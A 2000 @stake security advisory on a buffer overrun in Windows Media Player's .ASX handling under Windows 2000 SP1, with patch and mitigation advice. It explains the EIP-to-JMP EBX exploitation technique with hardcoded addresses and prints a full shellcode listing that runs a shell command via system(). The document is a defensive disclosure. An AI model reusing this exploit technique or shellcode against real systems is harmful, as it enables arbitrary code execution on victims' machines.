[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Windows 2000 .ASX Buffer Overrun

Title: Windows 2000 .ASX Buffer Overrun
Released by: @stake
Date: 23rd November 2000
Printable version: Click here

Hash: SHA1


                              @stake Inc.


                           Security Advisory

Advisory Name: Windows 2000 .ASX Buffer Overrun

 Release Date: 11/23/2000

  Application: Microsoft Windows Explorer with

               Microsoft Media Player v6.xx and

               Microsoft Media Player v7.xx.

     Platform: Windows 2000 SP1

     Severity: There is a buffer overflow condition that

               can result in execution of arbitrary code.

      Authors: Ollie Whitehouse [ollie@atstake.com]

Vendor Status: vendor has released patch

          Web: www.atstake.com/research/advisories/2000/a112300-1.txt


Microsoft Windows Media Player (http://www.microsoft.com/) plays

streaming media files which have the extension .ASX. There is a buffer

overrun caused by the way that WMP deals with the .ASX file format when

using the Web View option in Windows Explorer (enabled by default). This

problem can allow the execution of arbitrary computer code.

One method of exploitation requires the user to save the .ASX file down to

the local machine and navigate to it via Explorer. Single clicking once on

the file will cause Explorer to Auto-Preview the destination streaming

media file which is specified in the .ASX file.  Passing an overly long

destination to this media file will cause the buffer overrun to occur and

the abtirary code to execute.

This is another good example of why attachments from unknown sources

should not be trusted. Also why systems/network administrators should

evaluate the types of attachments which are allowed to be passed to users

desktops even though they may not contain any executable code.

There are other methods of exploitation which could allow .ASX files to be

opened automatically when a user visits a malicious web site.  This can be

prevented by configuring Internet Explorer not to run ActiveX controls.

Proof of Concept:

The following file once uncompressed contains

'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed within

Explorer with a single click, it will cause Microsoft Explorer to create a

file in the root of C:  called !test!. This file will contain a directory

listing of the current working directory when the proof of concept is

executed. Once this proof of concept is executed it will require

Explorer.exe to be restarted.

This example has been hardcoded to work with Windows 2000 (SP1) and

MSVCRT.DLL v6.1.8637. Another reason why this example is service-pack

specific is that the code is randomly located on the stack (so EIP can not

be pointed directly to the location of the arbitray code), EBX is located

4 bytes before EIP. The example overwrites EIP with the address of JMP EBX

(FF E2, this instruction is contained in kernel32 and thus static).  This

in turn then tries to execute the value at EBX (which containes NOPs),

then EIP (luckly this does not contain any code which alters or stops

program flow) and then finally executes the arbitry code placed on the

stack.  The assembly code which is executed by this example at this point

is contained at the end of this advisory. Within the ASX file the example

code is contained at offset 00005ce4h.

Proof of concept ASX File:

An ASX file which contains the problem is contained in this .zip file:



[Byte Code]    [Assembly]

90    nop

8B DC                mov         ebx,esp

8B E3                mov         esp,ebx

53                   push        ebx

8B DC                mov         ebx,esp

33 FF                xor         edi,edi

57                   push        edi

57                   push        edi

57                   push        edi

57                   push        edi

57                   push        edi

57                   push        edi

57                   push        edi

C6 43 E9 63          mov         byte ptr [ebx-17h],63h

C6 43 EA 6D          mov         byte ptr [ebx-16h],6Dh

C6 43 EB 64          mov         byte ptr [ebx-15h],64h

C6 43 EC 2E          mov         byte ptr [ebx-14h],2Eh

C6 43 ED 65          mov         byte ptr [ebx-13h],65h

C6 43 EE 78          mov         byte ptr [ebx-12h],78h

C6 43 EF 65          mov         byte ptr [ebx-11h],65h

C6 43 F0 2F          mov         byte ptr [ebx-10h],2Fh

C6 43 F1 63          mov         byte ptr [ebx-0Fh],63h

C6 43 F2 64          mov         byte ptr [ebx-0Eh],64h

C6 43 F3 69          mov         byte ptr [ebx-0Dh],69h

C6 43 F4 72          mov         byte ptr [ebx-0Ch],72h

C6 43 F5 3E          mov         byte ptr [ebx-0Bh],3Eh

C6 43 F6 63          mov         byte ptr [ebx-0Ah],63h

C6 43 F7 3A          mov         byte ptr [ebx-9],3Ah

C6 43 F8 5C          mov         byte ptr [ebx-8],5Ch

C6 43 F9 21          mov         byte ptr [ebx-7],21h

C6 43 FA 74          mov         byte ptr [ebx-6],74h

C6 43 FB 65          mov         byte ptr [ebx-5],65h

C6 43 FC 73          mov         byte ptr [ebx-4],73h

C6 43 FD 74          mov         byte ptr [ebx-3],74h

C6 43 FE 21          mov         byte ptr [ebx-2],21h

B8 AD AA 01 78       mov         eax,7801AAADh

50                   push        eax

8D 43 E9             lea         eax,[ebx-17h]

50                   push        eax

FF 53 E4             call        dword ptr [ebx-1Ch]

56                   push        esi

BB 2D F3 E8 77       mov         ebx,77E8F32Dh

FF D3                call        ebx

C3                   ret


Vendor Response:

Microsoft has released a security bulletin describing the issue:


Microsoft has release patches for Windows Media Player:

 Windows Media Player 6.4:


 Windows Media Player 7:



The best solution is to install the vendor patch for your version of the

media player.  This solves this specific problem.

In general, unless you need to run ActiveX controls, it is a good idea to

configure Internet Explorer not to run them.  At the very least you can

configure IE to not run ActiveX controls in the Internet Security Zone.

It doesn't matter whether the controls are signed or not.  As you can see

from this advisory even signed controls can have security problems.

Of course, never trust attachments from unknown sources, even data files

such as the .ASX files discussed in this advisory.

For more advisories: http://www.atstake.com/research/advisories/

PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.


Version: PGP 7.0





(C) 1999-2000 All rights reserved.